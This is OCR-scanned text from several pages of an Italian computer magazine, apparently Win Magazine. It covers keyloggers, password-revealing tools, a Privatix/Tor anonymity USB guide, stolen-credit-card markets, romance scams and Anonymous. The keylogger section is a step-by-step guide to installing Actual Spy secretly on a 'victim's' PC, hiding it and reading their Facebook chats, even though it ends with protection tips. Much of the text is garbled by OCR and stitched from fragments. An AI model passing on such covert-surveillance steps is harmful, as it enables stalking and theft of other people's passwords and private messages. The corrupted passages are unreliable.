za minima e massima della password ed avviamo il 
processo con un clic su Start non ci resta che atten¬ 
dere il verdetto finale 1 
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I Actual Spy I 



Un kevloqqer può registrare ciò che viene diaitato: 

password, e-mail e Chat non sono più al sicuro! 


Con una tastiera 
ci possono spiare 


4 



I l modo più semplice per spinrc le 
abitudini degli utenti davanti al PC? 
Registrare quello che digitano con 
la tastiera! È cosi possibile scoprire di 
tutto: passwnrd di accesso al computer, 
a Faccbook c ai vari servizi on line, e- 
tnail, intere sessioni di chat e 


di carta di credito, Per farlo, basta un 
keylogger, un programma-spia nato per 
monitorare gli accessi indesiderati ad 
un PC ma che, nei casoin cui ilsistema 
sia incustodito, può trasformarsi in un 
grimaldello perla vita privata delfutcn- 
te! I keylogger funzionano in maniera 


'invisibile” (quelli hardware, in realtà, 
sono piccoli dispositivi da collegare tra 
la tastierae il case del PC, ma nessuno 
ne verifica la presenza pi ima di avviare 
il sistema.. .)ein poco tempo riescono a 
violare ogni segreto dcH'iitente spiato! 
Non ci cred iamo? Beco le prove! 


». 


Il preferito dagli spioni 


P iacere, s ono la s p ia! 


a Nella sezione Speciali sul Win CD-ROM e presente I archivio 
Actualspy.zip. Scompatìiamoloedeseguiamoil file actualspy. 
exe per avviare l'installazione di Actual Spy sul PC della "vit¬ 
tima". Nel la pt ima schermala della p rocedura guidata cucchiamo Neri, 
spuntiamo I accept thè agreement e premiamo Next 


a : Cicchiamo ancora Next per tre volte, poi Instane. ai termine, 
Next e Finish. Avviamo il programma e confermiamo con OK 
nel box visualizzato Cucchiamo Start monitoring e poi Hide 
per occultare il keylogger Un box d ricorda la combinazione segreta 
\Ctri+Shift+A!t+F8) per renderlo nuovamente visibile. 



Il ra pporto finale 

H Torniamo, in seguilo, al PC della vittima, riattiviamo il keytog- 
ger e accediamo alle sue registrazioni. Giochiamo Internet 
Activtty. ecco in Websites visitetì, le attività che ha svolto su 
Internet 1 Individuiamo, ad esempio, quelle relative a Facebook e cuc¬ 
chiamoci sopra per visualizzare le sue sessioni di chat! 


PRIVACY; PROTEGGILA COSI 

^Installiamo e teniamo sempre aggiornalo l'antovirus e 
^l’antispyware. 

:(gÌ Proteggiamo il nostro account con password, creandola 
da Start'Pannello di controllo/Account utente 
■•gjjf Blocchiamo sempre la sessione di Windows premendo i 
£v tasi Wm+L quando d allontaniamo dal PC. 

Se usiamo uno Screensaver, proteggiamolo con 
password: cllccntamo col tasto destro del mouse sul 
desktop e poi su Persmlaza/Screen saver. Spuntiamo Al 
n ripristino, torna alla schermata di accesso. 

•$% Se condividiamo il PC-con altri utenti, creiamo per 
ognuno un account ‘imitato" per impedire I installazione 
di software. Accediamo a Start/Pannello di controllo/Account 
utente e seguiamo la procedura guidata. 


Cosaci 

occorre 

SOFTWARE 
DI MONITORAGGIO 

ACTUALSPY 

In trovi sii: V'CO-ROM 
Quanto roso gratuito 
Sito Internet- www 

nclnalteylogger.com 



ASTERISCHI 
SENZA SEGRETI 


L'aspetto più comune 
con cui «amo abituati 
a vedere un» password 
è Usua versione‘crip- 
tata". cioè nascosta da 
pallini, asterischi o altri 
simboli che impedisco¬ 
no di dare una sbircia- 
tina! Dato che molti 
preferiscono salvare le 
password, ad esempio 
nel browser, per acce 
dere velocemente al 
loro account Facebook, 
aumentano le proba¬ 
bilità di dimenticare! 
codici. Che fare in que 
sti casi? Basta usare un 
software che‘mette 


in chiaro ’ la password 


desiderata. Trai tanti 
segnaliamo Revelation 
e AsteriskKey. Questi 
programmi, però, sono 
disponibili a tutti e 
gli hacker li possono 
usare per recuperare 
le nostre password, t 
un classico esempio 
di software a doppio 
taglio, capace di servire 
a scopi nobili e a quelli 
più scorretti. 
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Anonimi sul Web 
con una pendrive 

Vuoi navigare, chattare e scaricare file senza farti 
tracciare? Così diventi fantasma in Rete 


Cosa ci 
occorre 

WSTRIBUZiCME LINUX 

PRIVATIX 

UVE-SYSTEM 

Lo Irm i o CO-ROM 
Quinto costa Gratuita 
Sito irteTet: 

www.mandalka. 

name/privatbi 


INSTALICR. WUX 

su use 

PLUNK TV BOX 
UNIVERSA!. USB 
INSTALLER 


L a privacy innanzitutto! Dovrehhe 
esserequesto il “pensiero fisso’ <1 i 
tutti coloro che usano un PC con¬ 
nesso in rete. Ogni volta che navighia¬ 
mo su un sito Internet, a cominciare 
dai motori di ricerca, questo raccoglie 
(anche a nostra insaputa) più inl'or 
ma/ioni possibili sul nostro conto. Nei 
caso di un motore, esso registra comi 
minimo la stringa ricercata e l'indirizzo 
IPusatodurauteil collegamento. Tnol- 
tre, è diffusa ormai da anni la pratica 
di utilizzare i cookie, sia per ricordare 
i dati di accesso, sia per memorizzare 
iurte le informazioni che il proprietario 
del silo intende conservare sul nostro 


hard disk. Pernon parlare poi di cièche 
avviene quando utilizziamo un social 
network. Questi "catturano” tutti i dati 
possibili eiin magi nobili per ottenere un 
profilo realistico degli utenti. È recente, 
ad esempio, lo smdio condotto dall'Uni¬ 
versità di Cambridge sui "Mi piace” 
ditegli utenti lasciano sul sito di Mark 
Zuckeibcig. Dai l.ikeè infatti possibile 
ricavare veri europi i UN A digitali degli 
iscritti, Whe sei li^gp profili sono chiusi 
e non visibilra0|tliion è nella lista degli 
amici. Cosa è possibile fare, quindi, per 
preservare al meglio lifpnj|j)riJprjpn 
cy V Una soluzione concreta pilè estui 
quella di utilizzare strumenti per ! 


navigazione anonima, o meglio ancora 
un sistema operativo creato ad hoc, da 
installare su una pennaUSB e utilizzare 
soltanto quando si vogliono proteggere 
le proprie sessioni di navigazione sul 
Web. Tra i sistein i operativi che possono 
fare al caso nostro c’è la distribuzione 
Linux Privatix basata su Debian che, 
come il nome lascia intuire, dispone 
di tutti gli strumenti, già configurati, 
per proteggere la navigazione Internet. 
Privatix, inoltre, può essere installata su 
una chiavetta USB in modo da divenire 
portatile pd essere usata su qualsiasi 
C ch^upporti il hoot da questo tipo 
iispositivi. Ecco come utilizzarla. 


Lami: CD-ROM 

Gratuito 

Sito Internet: 

wnvwpefldnvelinux.cxim 


□ Prepariamo la nostra pendrive 

Come prima cosa per poter navigare su Internet in completo anonimato dobbiamo installare sulla chiavetta 
la distribuzione Linux Privatix. Fatto ciò, ir 


impostiamo l’avvio del computer da USB. 



La ISO sulla pendrive 

■j Scompattiamo l'archivio Unrversal-USB. 
zip (segone Antivìrus&Sicurezza cel Win 
CD-ROM) ed eseguiamo il file Universa!-USB- 
Installer-1.9.2.8exe. Clicchiamo agree. dal menu 
delle Step 1 selezioniamo Try Unlisted Linux ISO. 
Con Browse scegliamo la ISO di Privati», la pen¬ 
drive su cui installarla e diamo Create. 
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a Boot da chiavetta USB 

2 Ora bisognerà avviare il sistema opera 
-~.J tivo usando la penna USB appena cre¬ 
ata. Entriamo nel BIOS (premendo CANC. F2 o 
altro tasto indicato in fase di Doot) e impostiamo 
la pendrive come periferica di boot Salviamo le 
impostazioni, premendo il tasto FIO e successi¬ 
vamente Y, quindi ravviamo 



Alcune funzioni utili 

3 Prima dì avviare il sistema vero e proprio, 
■s-J Privatix ci consente di scegliere alcune 
opzioni, Possiamo selezionare Failsafe una sor¬ 
ta di modalità provvisoria del sistema, oppure 
Memtestper eseguire un utile test deila memoria 
RAM Posizioniamoci su Uve e premiamo Invio 
per avviare la distriouzione 
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j Anonimi sul Web con una pendrive 
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Investigatore informatico 


B Protetti da sguardi indiscreti 

La distribuzione Privatix è pronta all’uso e integra un browser Internet, un programma di Chat e un Client Torrent 
già configurati per sfruttare la rete Tor. Vediamo subito come utilizzarli al meglio. 






^ Una Chat 


Lume 


e protetta ^ Nascondiamo anche itile... ^ .. .per leggerli soltanto noi 


^ Scaricare tramite la rete Tor 

3 Per scaricare un lile tramite la rete Torrent 
-.—J usando i proxy anonimi di Tor cicchiamo 
su Applications/IntemeLTransmission Sceglia 
mo con 4rWil torrent e clicchiamo due volte su 
Add Scegliamo di salvare il file su un'altra parti¬ 
zione della pendrive e avviamo il download 


Secure St el Key 

fP *•<! • > «o «ti :I|im i rrnp t 


a Le ap plicazioni di Privatix 

■f ! Avvialo il sistema, comparirà il desktop 
■a mmJ della distribuzione. Clicchiamc.sul menu 
Applications e apriamo la sezione 
remo un browser, un Client per la 
uno per la messaggistica e 
tware per scaricare file dalla rete torrent. 


^ Da vvero an onimi sul Web? 

2 i Per verificare se navighiamo usando la rete 
-* TOR, avviamo il browser Iceweasel. In bas¬ 
so a destra Noteremo la scritta Tor Enabled. Cuc¬ 
chiamo poi su Tor check nei preferiti; se tutto è 
rà II messaggio Congratulations. Your 
is configured to use Tor 


. 
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Stare* Password 
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Password Keyrinc 
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4 Usando Pidgin possiamo avviare una Chat 
—f privata: supporta molti protocolli di mes 
saggistica ed è configurato per i proxy della roto 
Tor. Avviato Pidgin, andiamo nel menu Tools/Pre- 
ferencese cucchiamo su Proxy per verificare che 
le impostazioni siano uguali a quelle del browser. 


Privatix permette anche di criptare file 
e cartelle Per farlo selezioniamo con il 
destro I file da criptare e scegliamo Encrypt. Noi 
la nuova schermata cliccbiamo su New quindi su 
PGP Key , inseriamo le informazioni richieste, cuc¬ 
chiamo su Create e infine sulle chiavi create. 


0 Nel caso in cui vogliamo accedere a un (ile 
-=*=•/ già criptato, cucchiamo col destro e gce 
gliamo'Open with Decrypt File. Inseriamo la pas 
sword scelta precedentemente: se è corretta, verrà 
creato un file in chiaro con il nome originano. Non 
dimentichiamo di eliminarlo dopo averlo usato! 



IXQUICK, IL MOTORE 
DI RICERCA DISCRETO 


Se temiamo che le nostre ricerche possano essere trac¬ 
ciate da chi si occupa di marketing all'interno dei motori 
di ricerca, possiamo usare Ixquick (www.ixquick.com). 
Questo motore di ricerca, fondato nel 1998, promette 
di non registrare TIP del visitatore, di non memorizzare 
cookie sul computer di quest'ultimo edi fornire risultati 
molto più precisi e completi dei suoi più conosciuti con 
correnti. Ixquick utilizza infatti i database di quasi tutti 
i motori di ricerca della Rete ed è in grado di effettuare 
ricerche anche sugli elenchi telefonici internazionali. 
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ixquick 

L'unico motore di ricerca ai mondo che garantisce la privacy 
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Adtted 7769 Fnesh cards UK&EU MIX + DOB! 

dar •»«■!* - <ra 


Added 1701 Fresh cards UK&EU MIX 


Suppert tidoecs 


Added 10000 Fresh cards NIIX/EU! 
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In questo numero 
scoprirete come le 
organizzazioni 
criminali 
guadagnino un 
sacco di soldi con i 
dati delie carte di 
credito altrui, come 
I truffatori 
imbroglino le donne 
nei siti per single, 
come Anonymous 
possa mettere alla 
berlina Online un 
innocente e come 
vengono spiati gli 
utenti Microsoft. 


Time far thè autcmatic replacement of euro cards we give onty 15 minutes 1 
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U n trafficano , si firma con lo pseudonimo di 
Rancor" surTOnira clàpdc srino “German Busi¬ 
ness Network” sctVc, senza troppi preamboli: 
"Offro dati di carte di credito 
sgraffignata “fresca” e anche "prima J 
tnollo la validità delle carte”. Il prezzo defi 
scotta non è neanche caro: 40 euro a carta 
poco per entrare in possesso di tucti : dati indispensà^ 
bili per poter lare shopping su Internet a spese di 
estranei, fino al lirmcedel plafond? Si tratta di un caso 
isolato? Neanche per idea! Win Magazine ha seguito 
le tracce di quesci criminali e fiuto ricerche su vari fo¬ 
rum clandestini, li risultato è stato spaventoso: questi 
board trattano quotidianamente migliaia di dati di 
carte di credito rubare; un torbido business di milioni 
di euro farro alle spalle di ignari utenti. 

Nel iranno dela Mafia di Internet 

Finora ì truffatori su Internet avevano preso di mira 


I pirati del Web sono collegati via Internet 
a ORGANIZZAZIONI MALAVITOSE 
INTERNAZIONALI. Insieme danno la 
caccia a prede lucrose e facili da cacciare: 
i dati delle carte di credito. 


soprattutto lonline banking, ma meccanismi di prote¬ 
zione conte gli SMS-TAN o i generatori di TAN 
(Transaction Authonzation Number), hanno reso più 
difficile i furti in questo settore. Per questo i criminali 
si sono lanciati su un bortino più accessibile: le carte di 
credito, in questo campo, gli strumcntidi protezione 
lUmerosc banche non sono ancora al top e gli ucenti 
m e# p mretei. 

Nu^cJjrci^ja 4 carra 1 data di scadenza, codice di con¬ 
trollo e OOTj^^iossessore: sono questi i dare che ser¬ 
vono ai cybe^^iminali per acquistare a spese altrui. 
Per recuperarti sfruttano Trojan, ad esempio, che rie¬ 
scono a installare illecitamente sui computer degli 
Utenti. Oppure ricorrono a veri c propri attacchi ha¬ 
cker, verso server di banche e siti di shop online non 
•adeguatamente protetti. Un caso recente riguarda il 
gruppo hacker PawkesSecurity, che ha latto sapere di 
aver sottratto i dari di 21) 000 carte di credito nel corso 
di un attacco alla banca britannica IÌSBC. 


Parecchie migliala di carte di credito vengono quotidianamente scambiate in questa botsa clandestina. Qui si nascon 
dono efficienti organizzazioni matiose, che vendono ad altri criminali I dati delle carte rubate. 
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‘Carte di credito fresche di phishing"’: ecco come II pirata pubblicizza in rete i dati estorti ad utenti tede¬ 
schi di carte di credito. In questo caso vengono fomite anche le informazioni necessarie per aggirare il si¬ 
stema di protezione 3D Secure. 


Nella maggior parte del casi, i pirati si impos¬ 
sessano delle informazioni ricorrendo al plii- 
shing, inviando e-mail o Tramite pagine inter¬ 
net fraudolente. thè simulano la richiesta della 
conferma dei dati utente da parte della banca, 
ma che in realtà servono solo ad estorcere i dati 
della carta di credito Questi attaccai vengono 
sferrati irf modo sempre più raffina nt/^fclLforo 
a destra). ** i 


HA 


Carte di credito valide a partire da 5 euro, 
con garanzia 

TI numero degli atracch i che va a buon fine è ele¬ 
vato. I pirati carpiscono fraudolentemenre nn 
numero così elevato di dati di carte di credito, 
vlie una loro considerevole quota viene addirit¬ 
tura rivenduta ad altri truffatori: su pagine 
clandestine come DarWspot o Carderlife, pro¬ 
spera il commercio di moneta elettronica ruba¬ 
ta. La grande borsa dei ricettatori CC4You si 
vanta addirittura di trattare quotidianamente 
dalle 1.000 alfe 7.000 nuove carte, provenienti 
da tutta Europa. 

Si possono trovare dati di carte di credito a par¬ 



tire da 1 Euro; solitamente queste sono carte 
prossime alla scadenza, mentre tane con sca¬ 
denza non vicina costano tra i 10 e i 20 Euro 
Venditori più esperti, come "rancor" del Ger- 
man Business Network, possono permettersi di 
pretendere un prezzo raddoppiato, poiché godo¬ 
no già di una certa reputazione su questo merca¬ 
to. Per gli acquirenti diminuisce quindi il ri¬ 
schio di essere imbrogliati. Cybcrjack, un pira- 
promccrc addirittura che: “se una carta non 
edema-, può essere sostituita entro 11 mino 
tu ’.qraiucj ptu preziosi sono i dati del paga¬ 
mento, ottenere un profi¬ 

lo l'ersonaledcl possessore della carta, sostiene 
Martin Secgcr, espèrio di -acurc-zza dcll.i NetLI- 
SE AG. Con queste informi zfoni} che gassi 
essere raccolte ila Facebook e Gru eie A / [Xj 
bile rispondere anche a quesiti sull: 
dei conti Online. 


Indirizzo del mittente molto credibile e mali scritta 
in un italiano quasi perfetto: con un’E-mail di phi- 
shing di questo tipo, si può rimanere fregati I cri¬ 
minal! sfruttano il fatto che t possessori della carta 
sono già abituati a questo tipo di verifiche e li in¬ 
ducono a reinserire I dati della loro carta di credito 
in Internet su siti fraudolenti. 


Il commercio protetto dall'anonimato 

Un’offerta di carte di creduto così gigantesca su 
lorum di vendita professionali lascia intuire 
come non si è in presenza di singoli ben orga¬ 
nizzati, ma di carcelli internazionali di cyber- 
criminali. La polizia, criminale ritiene addirit¬ 
tura ehe si possa parlate di una “ripartizione 
del lavoro" tra i vari criminali. Recenti indagi¬ 
ni hanno portato gli investigatori a seguire 
tracce in Gran Bretagna, Bulgaria, Norvegia e 
LISA, ad esempio. Grazie all'anonimato ili in¬ 
ternet, questa criminalità organizzata c in gra¬ 
do di cancellare iti modo hn troppo semplice le 
proprie tracce: le borse dei ricettatori, sulle 
liliali Win Magazinc ha effettuato ricerche, 
erano per lo più registrate presso indirizzi 
nell'estrema parte orientale della Russia; altre 
erano dislocati su server nei Caraibi o nell’Eu¬ 
ropa dell'Est. Le trattative avvengono sorto no¬ 
mi di copertura c i pirati sono prudenti anche 
nei pagamenti: scambiano euro e dollari solo 
tramite il sistema di pagamento Liberty Reser¬ 
ve e finalizzano il tutto tramite conci bancari 
in Co sta Rica. Questo metodo rende diffìcile ri¬ 
salire agli autori 


MINACCE 

DEL MESE 


FIFA PHISHING 

Con una 
grande 
azione di 
phishing, i 
pirati cerca¬ 
no di im¬ 
possessarsi 



dei dati utente dei giocatori di FIFA 
13. Le mail fraudolente invitano i gio¬ 
catori ad aggiornare i dati del loro ac- 
count. Cancellatele subito I 


ONDATA DI VIRUS DA SPAM 


Secondo rilevazioni dell azienda per la 
sicurezza Fleven, è in aumento il pen¬ 
colo di contrarre virus dalle E-Mail. 

Nel mese di agqsto oltre 1 000 mail 
di Spam contenevano link ad una pa¬ 
gina Internet infetta (Drivs-by-Down- 
Icari), aumentando il loro numero di 
80 volte ne! mese successivo. 


PAYPAL NEL MIRINO 


Un recente report di Trend-Micro se¬ 
gnala i cinque servizi Online più colpi¬ 
ti dagli attacchi di phishing: al primo 
posto si è attestato PayPal, seguito 
da Ebay, Baùle Net e AOL. Spesso 
sotto il tiro, troviamo anche i giocatori 
di Runescape. 


ANCORA SCAM “NIGERIANO’ 


Ritorna in auge l'offerta di scarti nigeria¬ 
no con una nuova ondata di mai! che ri 
chiedono assistenza pertrasferine o ot¬ 
tenere denaro in cambio di un compen¬ 
so. Nctl'e mail c'è sempre un riferimen 
to a fatti o personaggi di attualità, ma 
voi non cascateci e cancellatela subito! 


APP ANDROIDINSICURE 

Secondo uno studio delle università di 
Hannovere Marburgo, i sistemi di codifi¬ 
ca di numerose App sono difettosi I ri¬ 
cercatori hanno controllato oltre 13.000 
tra le App più scaricate e in più di 1.000 
hanno nlevato falle di sicurezza. 
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NEWS 

MICROSOFT CI SPIA 

Contrariamente agli annunci fatti. 
Microsoft non ha mantenuto le sue 
promesse. Il gigante del software 
sta modificando le condizioni di uti 
lizzo dei propri servizi Hotmail, Sky 
DrrveBing, MSN e altn Secondo il 
paragrafo 3 3 delle nuove condizio¬ 
ni generali, l'azienda è ora autoriz 
zeta a leggere e analizzare I dati 
degli utenti. Recentemente Micro¬ 
soft aveva realizzato alcuni video 
Ironici nei quali criticava Google 
proprio per questa pratica. 

«MS 
CONTRO IL 8I0B8ING . 



I suicidio della quindicenne Amanda 
Todd causato da mobbing in rete e 
dal nratto di un pedofilo, è causa di 
tristezza e smarrimento in tutta la 
community di Internet. Il video di 
YouTuoe. dove la studentessa cana¬ 
dese manifesta I motivi del suo sia- 
cidic su una scheda, ha indotto i 
collettivo Internet Anonymous ad oc¬ 
cuparsi delta ricerca dei colpevole e 
della divulgazione della sua Identità 
su Facebook. Google+ e Twittor. Così 
facendo, però, si rischia di mettere 
un innocente alla berlina di Anony- 
mous Noi riteniamo che in questi 
casi. anziché farsi giustizia da sé. 
sia meglio ricorrere ad un aiuto com¬ 
petente, informando dell 'accaduto 
la Polizia Postale. 
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Questa pagina di ricettatori offre carte di credito tedesche provviste di password 3 D Scorre. 


Milioni di euro di danni 

Latriti delle somme che i truffatoti di carte di credito 
arraffano, può essere solo intuita: Visa afferma che le fro¬ 
di ammontano a circa lo 0,04 percento de] volume di af¬ 
fari annuo. Considerando ciré le transazioni effettuate 
[lite carta Visa nel 2011 in Europa ammontano a cir- 
rWuirdi di cum, sono stari Truffati circa 680 mi- 
lioni tu euro MasterCard non indica alcuna cifra, ma la 
situaziufl?dofftjj®i*ssere più o meno simile. Da tempo 
però, le frodi segJHate liuti comprendono tutti ì casi: ‘i 
dati non ri levati dalifttatistidicpotwldjpro essere eleva¬ 
tissimi ", afferma Barbara? fi i iani-r del la ( oliava criminale 
federale tedesca. Questo perché riSh «ptiSw^tipitad si 
accorgono della trutta subita o la segna%i^lJl> m • 
cyber-criminali più raffinaci non prelevano mge ìtf it 
porri da poche carte di credito, ma piccole somme 
numerose carte". Prelievi simili difficilmente vengono 
notati. 


Nuovo sistema di sicurezza 
violato da motto tempo 

Per le banche il problema del | Ju- 
shing sui dati delle carte di credi¬ 
to non è nuovo. Anche il sistema 
3-D Secure, noto anche come 
"Verified by Visa oppure "Ma¬ 
sterCard SecureCodc ", introdotto 
due anni fa per impedire eventua¬ 
li abusi, serve a ben poco. 

Pare elle i guai subiti per anni a 
causa elette frodi sul bankingOnli¬ 
ne, non siano serviti a niente e so¬ 
no stati addirittura riperuri dei 
vecchi errori, anziché creare una 
nuova password, ossia un nuovo 
TAN sicario, |ier ciascun nuovo 
pagamento, il sistema 3-D Secure 
chiede sempre la stessa password. 
Thorsten Urbanski di G Data ha 
criticato quest'approccio affer- 
manclo che “per i pirati [...] co¬ 
stituisce solo un'altra formula di 


“I dati dela carta con 
le informazioni personali 
rendono d pii” 

Martin Seeger, esperto di sicurezza 
della NetUSE AG 



phishmg e non rappresenta nessun reale ostacolo". 
Un’occhiata alle "offerte'’ proposte dai ladri di carte- 
conférma che sborsando almeno 4L) euro viene quasi 
sempre fornita anche questa password. Irritante: il 3-D 
Secure interviene solo nei pagamenti online;se il cliente 
viene successivamente invitato da una pagina di phi- 
sliing a digitare ì propri dati, il procedimento appare 
già familiare e quindi lo si segue senza porsi troppe do¬ 
mande. 

Reazione delle banche 

Le banche cercano di minimizzare il problema, dichia¬ 
rando die ai clienti oggetto di truffa con carta di t rcvlito, 
il denaro sottratto viene rimborsato purché non abbiano 
rato con una negligenza grossolana Ma perché ren- 
e la vnn tosi facile ai pirati del Wqb? La giusti tìciiziu- 
r s# , #lr die tutu hanno messo in ano le norme di 
r le società offerenti carte di credito e 
imposte da^K Secure Fortunatamente coti Lintrudu- 
zione da parte di molte banche 
dei TAN individuali, ovvero di 
quegli aggeggici die forniscono 
una password da inserire nel sito 
oltre alla propria, la situazione è 
migliorata. Il fatto che questi 
TAN possano essere inviati tra¬ 
mite smartphone pone però un 
ulteriore problema; i pirati po- 
trebbero infettare gii Smartphone 
con de i Trojan. Secondo Ross An¬ 
derson dell’univetsità di Cam¬ 
bridge, “l'operazione diventa pro¬ 
blematica, se il cliente procede ad 
un acquisto con carta di credito 
utilizzando lo stesso Smartphone 
sul quale ha ricevuto l'SMS- 
TAN . Considerando che secon¬ 
do Visa entro il 2(J2l) oltre la me¬ 
tà di tutti i pagamenti tramite 
catta di credito verrà fatto tramitt- 
Smartphone, il problema dovrà 
essere affrontato ben presto. 






































A nnette (52)di Dortmund ha dSfpigfqj^vorta: e 
amore a prima vista. Non c'è terra JyteraL 

Gilbert è un tipo lormidabiie e nel fitte detti» 
anni, le foto del suo profilo nel sito dei single, Lmnf 
risaltare il suo fisico: mettendo in mostra i suoi mu¬ 
scoli, si stiracchia sulla spiaggia della riviera e poco 
prima dell incontro era ingegneri della sua azienda, si 
presenta indossando un abito elegante. Ma un paio di 
giorni prima dell'incontro (issato via chat, nascono 
dei problemi: il portafogli di Gilbert è stato rubato. 
Egli scrive die Annette deve aiutarlo, prestandogli 
cortesemente 500 euro per il biglietto aereo. 11 dena¬ 
ro le verrà restituito al momento dell'incontro. An¬ 
nette effettua il bonifico sul conto segnalato della 
Western-llnion r in questo modo scompaiono sia il 


tannica Monica Whitcy, esperta di Romance-Scam- 
ming e consulente per la polizia inglese, riferisce di 
^00.000 donne truffate nella sola Gran Bretagna, ne- 
nni passati (vedi intervista a destra). 

7rjj^hi Njgcria-Gwnettion vuole carpire denaro an¬ 
che a slìjgihr di ai tri Paesi e prova ad estorcere piccole 
e meno picnoic Sf>rniue;®n lo stratagemma degli an¬ 
ticipi di denarn Ptt ur W al k i spese di viaggio, 
uno dei reati untine pm ^rjjJiP^iiti. 

GS Scanner depredano move utenti fi ': 1 

Di quanto il problema sia nel frattempi 
vasto, ne è a conoscenza anche Henning \va 
che da anni analizza forum di single: in Germania 
5 top forum per incontri tra single eliminano quoti 



U 


Il Romance-Scamming, cioè le truffe che avvengono sui 
siti d'mcontri, sta assumendo proporzioni drammatiche!” 


denaro che Gilbert, che non si farà mai più vedere. 
Annette non c la sola a vivere questa situazione, rac¬ 
contando storie commoventi, i truffatori cercano og¬ 
gi di carpire del denaro a migliaia di donne che fre¬ 
quentano i siti di flirt. È qui che si celano nuovi rag¬ 
giri della cosiddetta ‘Nigeria Connection”, i pirati 
dcll’Alrica occidentale da tempii noti per le loro frodi 
online 

Dome tedesche né rimo 

NegLi USA gli “impostori romantici” (“Romance 
Scarnine! ' ) sono da lungo tempo una piaga: la sezio¬ 
ne anagrafica dclITnr per i reati su Internet, ha regi¬ 
strato nel 2f)l 1 truffe per 50,3 milioni di dollari, 
fondi trasferiti in prevalenza da cittadine statunitensi 
a "Romance Scammet” africani, lai professoressa bri¬ 


dianamente oltre 5.000 profili di partecipanti di ori¬ 
gine nigeriana”, riferiscono gli esperti. 

Wiechers riferisce che "Se parliamo di portali per in¬ 
contri, analizziamo i flussi di traffico e mettiamo a 
confronto i rapporri delle vittime colpite in tutte le 
regioni, arriviamo alla conclusione che il danno an¬ 
nuo, viene prudentemente stimato in 10 mihuni di 
Euro", per un totale di circa 8.000 vittime all’anno. 
Gli scammcr preferiscono attaccare proprio le ucenti 
che si avvicinano per la prima volta ai forum di sin¬ 
gle. Il consiglio di Wiechers: qualora venga chiesto 
di sborsare del denaro per acquistare biglietti aerei o 
altre spese per concretizzare il primo incontro, le 
urenti dovrebbero cancellare immediatamente que¬ 
sto loro nuovo amore Online. Risparmierebbero stress 
e denaro. 


INTERVISTA 

Prof. Monica Wtiitty, 

Esperta della polizia 
per S Romance-Scamming 

Profossore ssa Whitty, come mal le vittime ca¬ 
dono nella trappola dei Romance Scammer e 
trasferiscono lino ad oltre 1.000 Euro a Indivi¬ 
dui del tutto sconosciuti? ’ 

Wtimy: il motivo principale e da ricercare 
nel fatto che molte donne di età superio¬ 
re ai 30 anni residenti nei paesi indu¬ 
striali occidentali, si sentono sole e han¬ 
no una gran voglia di affetto Peccato 
che queste attenzioni non le ricevano 
quasi mai in questi portali di dating. Ec¬ 
co perché diventano vulnerabili a mani¬ 
polazioni del genere. 

Esistono molto vittime di queste truffe? 

Whitty: Molte più di quanto si pensi! Sulla 
base di uno studio rappresentativo, ab¬ 
biamo accertato che in Gran Bretagna 
esistono circa 200.000 vittime. Negli 
USA, secondo quanto riferito da FBI, nel 
2011 i cittadini americani hanno versato 
a Rcmance-Scammer compiessivamerv 
te 50,3 milioni di dollari, dei quali 39mi- 
lioni trasferiti da donne di età superiore 
a 50 anni. E questi sono soltanto i casi 
denunciati dalle vittime! 

I Romance-Scammer africani si sono ripartiti 
Ira di loto le zone del mondo? 

Whitty: Si. volendo semplificare si pub di 
re che gli USA vengono gestiti di Ohanr- 
sr. mentre la NigenaConnection “cura’ 
l'Europa occidentale. 

Quali sono i portali di Dating più colpiti? 
Whitty: Naturalmente, soprattutto le pagi¬ 
ne Internet più di tendenza, dove sono 
presenti annunci gratuiti, visto che qui i 
Romanee-Scammer non devono preoc¬ 
cuparsi di pagare i loro annunci con car¬ 
te di credito falsificate o rubate. 

È possibile bloccare i Romance-Scamméng? 
Whitty Sarebbe sensato che questi por¬ 
tali venissero chiusi e si introducessero 
dei filtri unificati per lo scam. 
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ry Investigatore informatico 

Chi si nasconde 
dietro la maschera 


Win Magazine ti svela identità e obiettivi di Anonymous, il gruppo 
hacker più chiacchierato del momento 



COSA VUOLE 
ANONYMOUS? 

All inizio era soltanto una forma di protesta contro la 
setta Scientologv Poi Anonymous ha iniziato adatti 
varsi contro ogni forma di censura e contro i dittatori, 
i violatori dei diritti umani, i distruttori deH'ambieote e 
anche contro aziende private. Mon tutti gli attivisti d 
Anonymous perseguono questi obiettivi, ancne per¬ 
ché nessuno può parlare a nome degli attivisti stessi. 

GU ANONYMOUS SONO 
DEI CRIMINALI? 

Non esattamente, perché Anonymous non si oc¬ 
cupa di truffe e raggiri Anonymous vede se stes¬ 
so come un movimento sociale che si batte per la 
liberta di espressione, Ma il gruppo spesso ignora 
le eggi e molte azioni risultano quindi illegittime. 



In alcuni stati, gli attivisti sono pertanto considera¬ 
ti come un “gruppo terroristico". 

COME SI È CREATO 
ANONYMOUS? 

Anonymous ha iniziato a diventare pubblico dal 
2008. ma le origini del collettivo risalgono a molto 
prima. Circa dieci anni fa internet cresceva in po¬ 
polarità e iniziavano a diffondersi le prime piatta¬ 
forme ' ulte quali venivano pubb icati testi e imma¬ 
gini in torma completamente anonima. Su queste 
piattaforme nacque Anonymous. 


CHE SIGNIFICATO 
HA LA LORO MASCHERA? 

Il volto sorridente di plastica Ira notevolmente con¬ 
tribuito alla reputazione di Anonymous. È il volto 
di Guy Tavvkes, colui che cercò di far esplodere il 
Parlamento britannico 400 anni fa. La maschera è 
la carattenstica distintiva degli attivisti Internet. In 



manifestazioni e messaggi video i membri la usa¬ 
no come mimetizzazione. Anonymous ha scelto 
questo simbolo per una ragione poco storica: Nel 
film "V come Vendetta ’ i combattenti per la libertà 
si travestivano con questa maschera quando agi¬ 
vano contro il governo totalitario. 

CON QUALI ARMI ATTACCANO 
GU ANONYMOUS? 

Quando Anonymous attacca su Internet, di solito lo 


LE AZIONI PIÙ SPETTACOLARI 


2008 - Project Chanology 

Quando su YouTuoe venne pubblicato 
un video di Scientology con Tom Crui 
se, Anonymous lancia attacchi Internet 
e organizza aire astrazioni 


DI ANONYMOUS ! 


2011 - Operation Sony 

Anon/mous la ncia attacchi al PlayStati on Network dopo che So¬ 
ny aveva citato in giudiziodue hacker che si occupavano di gio 
chi per aconsole. Ri mane da chiarire se Anonymous sia respon¬ 
sabile anche del furto dei dati di milioni di utenti del networc. 


2008 2009 2010 2011 2012 

2010- Operation Payback 2011 - Operation Zeta 

Anonymous attacca in particolare le istituzioni fi- L'azioneé rivolta contro i boss messicani della droga,Orlando fu 

nanziane che aderisconoal blocco dei conti della preso un attivista come ostaggio.Anonymousminacòòdi pubbli- 

piattaforma WikiLeaks. care gli indirizzi dei signori della droga. L'attivista venne rilasciato. 


90 Win Magazin- ; 





